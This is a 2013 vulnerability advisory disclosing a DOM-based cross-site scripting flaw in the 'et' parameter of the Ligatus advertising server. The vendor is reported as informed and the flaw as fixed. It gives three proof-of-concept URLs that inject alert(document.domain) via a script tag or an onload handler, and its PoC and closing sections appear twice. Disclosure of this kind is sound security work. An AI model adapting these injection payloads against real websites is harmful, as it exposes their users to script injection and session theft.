SSCHADV2013-007 - Ligatus Advertising - DOM Based Cross-site Scripting vulnerability
Advisory:
|
Ligatus Advertising – DOM Based Cross-site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2013-007
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on a.ligatus.com
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The ‘et’-Parameter in Ligatus Advertising is prone to a DOM Based XSS vulnerability.
======================
PoC-Exploit
======================
// Internet Explorer 10
http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><body onload=alert(document.domain) />
// Aurora 8.0
http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><script>alert(document.domain)</script>
// FF 20.0.1
http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><body onload=alert(document.domain) />
======================
Disclosure Timeline
======================
11-May-2013 – vendor informed by email
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.ligatus.de/
http://www.darksecurity.de/advisories/2013/SSCHADV2013-007.txt
PoC-Exploit
======================
// Internet Explorer 10
http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><body onload=alert(document.domain) />
// Aurora 8.0
http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><script>alert(document.domain)</script>
// FF 20.0.1
http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><body onload=alert(document.domain) />
======================
Disclosure Timeline
======================
11-May-2013 – vendor informed by email
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.ligatus.de/
http://www.darksecurity.de/advisories/2013/SSCHADV2013-007.txt
Comments
Display comments as Linear | Threaded